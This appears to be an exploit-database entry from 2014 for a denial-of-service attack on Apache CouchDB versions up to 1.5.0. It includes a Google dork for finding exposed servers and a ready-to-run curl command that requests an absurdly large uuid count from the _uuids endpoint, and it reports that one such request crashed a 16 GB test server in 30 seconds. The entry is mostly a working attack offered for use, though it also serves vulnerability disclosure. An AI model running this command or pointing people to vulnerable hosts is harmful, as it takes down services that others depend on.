16 lines
No EOL
514 B
Text
Executable file
16 lines
No EOL
514 B
Text
Executable file
# Exploit Title: Couchdb uuids DOS exploit
|
|
# Google Dork inurl: _uuids
|
|
# Date: 03/24/2014
|
|
# Exploit Author: KrustyHack
|
|
# Vendor Homepage: http://couchdb.apache.org/
|
|
# Software Link: http://couchdb.apache.org/
|
|
# Version: up to 1.5.0
|
|
# Tested on: Linux Couchdb up to 1.5.0
|
|
|
|
HOW TO
|
|
======
|
|
curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999
|
|
|
|
TEST
|
|
====
|
|
Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request. |